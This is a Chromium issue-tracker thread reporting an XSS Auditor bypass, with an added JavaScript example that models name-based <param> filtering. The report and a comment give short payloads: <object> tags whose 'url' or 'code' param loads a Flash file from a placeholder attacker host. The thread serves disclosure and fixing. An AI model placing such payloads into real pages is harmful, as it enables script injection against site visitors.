
Issue metadata

Status: Duplicate
Merged: issue 783618
Closed: Nov 2017
EstimatedDays: ----
NextAction: ----
OS: Linux , Android , Windows , Chrome , Mac
Pri: 3
Type: Bug


Issue 676992: XSS Auditor bypass using object tag and url parameter

Reported by, Dec 26 2016

Issue description

I'd like to report an XSS Auditor bypass bug.
PoC is here:

<object allowscriptaccess="always">
<param name="url" value="https://attacker/xss.swf">

Could you confirm this bug?

Version 57.0.2962.0 (Official Build) canary (64 bit)

Comment 1 by, Dec 26 2016

It seems it also works with name="code".

<object allowscriptaccess="always">
<param name="code" value="https://attacker/xss.swf">

Comment 2 by, Dec 27 2016

Components: Blink>SecurityFeature
Labels: -Type-Bug-Security -Restrict-View-SecurityTeam Type-Bug
Status: Assigned (was: Unconfirmed)
Thanks for the report. Tom, could you take a look when you get a chance?

Comment 3 by, Jan 3 2017

Status: Started (was: Assigned)
Looks like there are a few more <param> cases to cover.  Thanks for the report.

Comment 4 by, Jan 3 2017

I'm also going to filter the allowscriptaccess attribute in <object>, just because, even though there's enough malice that can be accomplished even without it.

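The pattern behind the PoC above and the fix discussed in comments 3 and 4, as an added example written for this page (it is not Chromium/Blink code and not from any participant in this report): a small JavaScript model of a reflected-markup filter that decides which <param> values are URLs by the param's name. The two name sets, the page host "victim.example", and the function names are assumptions for illustration; the XSS Auditor's real parameter list is not shown on this page. The snippets are constructed from the two PoCs in the report plus one baseline case.

```javascript
// Added example (not Chromium/Blink code). Models the bug class in this report:
// a reflected-markup filter that decides which <param> values are URLs by the
// param *name* passes a payload that uses a name outside its list, even though
// the plugin treats that value the same way. The two name sets below are
// assumptions for illustration, not the XSS Auditor's actual lists.
const NARROW_URL_PARAMS = new Set(["movie", "src", "data"]);
const BROAD_URL_PARAMS = new Set([...NARROW_URL_PARAMS, "url", "code"]);

// Parse the <object> start tag and its <param> children. Regex-based and
// deliberately minimal: it handles the double-quoted shapes in this report only.
function parseObjectSnippet(html) {
  const objMatch = /<object\b([^>]*)>/i.exec(html);
  if (!objMatch) return null;
  const attrsOf = (s) => {
    const out = {};
    for (const m of s.matchAll(/([a-z-]+)\s*=\s*"([^"]*)"/gi)) out[m[1].toLowerCase()] = m[2];
    return out;
  };
  const params = [];
  for (const m of html.matchAll(/<param\b([^>]*)>/gi)) {
    const a = attrsOf(m[1]);
    if (a.name !== undefined) params.push({ name: a.name.toLowerCase(), value: a.value || "" });
  }
  return { attrs: attrsOf(objMatch[1]), params };
}

// True if the param value is an absolute URL on a host other than pageHost.
// Relative URLs fail to parse and are treated as same-origin.
function pointsOffOrigin(value, pageHost) {
  try { return new URL(value).host !== pageHost; } catch (e) { return false; }
}

// Would a filter with the given URL-param name list (and, optionally, the
// allowscriptaccess attribute check proposed in comment 4) block this snippet?
function wouldBlock(html, pageHost, urlParamNames, filterAllowScriptAccess = false) {
  const parsed = parseObjectSnippet(html);
  if (!parsed) return false;
  if (filterAllowScriptAccess && "allowscriptaccess" in parsed.attrs) return true;
  return parsed.params.some(p => urlParamNames.has(p.name) && pointsOffOrigin(p.value, pageHost));
}

// Constructed snippets: the two PoCs from this report plus a baseline that the
// narrow list already covers.
const POC_URL  = '<object allowscriptaccess="always"><param name="url" value="https://attacker/xss.swf">';
const POC_CODE = '<object allowscriptaccess="always"><param name="code" value="https://attacker/xss.swf">';
const BASELINE = '<object><param name="movie" value="https://attacker/xss.swf">';

// Summarise which snippets each policy blocks; returned rather than only printed.
function compare(pageHost = "victim.example") {
  const cases = { POC_URL, POC_CODE, BASELINE };
  const result = {};
  for (const [label, html] of Object.entries(cases)) {
    result[label] = {
      narrow: wouldBlock(html, pageHost, NARROW_URL_PARAMS),
      broad: wouldBlock(html, pageHost, BROAD_URL_PARAMS),
      narrowPlusScriptAccess: wouldBlock(html, pageHost, NARROW_URL_PARAMS, true),
    };
  }
  return result;
}

console.log(JSON.stringify(compare(), null, 2));
```

With the narrow list, both PoCs pass untouched because "url" and "code" are not in it; widening the list catches them, and the allowscriptaccess check catches them independently of the param name. The design point is the one comment 10 makes: the filter cannot know from the name alone how the plugin will interpret a value, so a name-based allow/deny list is only as complete as the last bypass report.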
Comment 5 by, Jan 3 2017

is where we decide which name=xxx parameters are candidates for sanitization.

Comment 6 by, Jan 3 2017

has its own ideas about URL parameters.

Mike, should we unify the two?  Have a suggestion about who else might weigh in on param element behaviour?

Comment 7 by, Jan 3 2017

Mike: |allowscriptaccessAttr| token doesn't exist, can we add this to whatever IDL generates these?

Comment 8 by, Jan 3 2017

Bouncing to mike to get some answers.  Pls re-assign to me afterwards.

Comment 9 by, Feb 23 2017

Labels: xssauditor

Comment 10 by, Feb 24 2017

Labels: OS-Android OS-Chrome OS-Linux OS-Mac OS-Windows Pri-3
I missed this, apologies:

1.  I don't think we handle `allowscriptaccess` in Blink today; we just hand all the params over to the plugin and let it figure out what it ought to be doing with them. Feel free to add it to `Source/core/html/HTMLAttributeNames.json5`.

2.  I think unifying the URL parameter behavior makes sense. Do you have a concrete suggestion for doing so?

Comment 11 by, Nov 10 2017

Labels: Hotlist-EnamelAndFriendsFixIt

Comment 12 by, Nov 10 2017

Mergedinto: 783618
Status: Duplicate (was: Started)
Oddly enough, this came in again recently.  Doing the uncool thing of duping the old into the new, because that's where the work is happening.
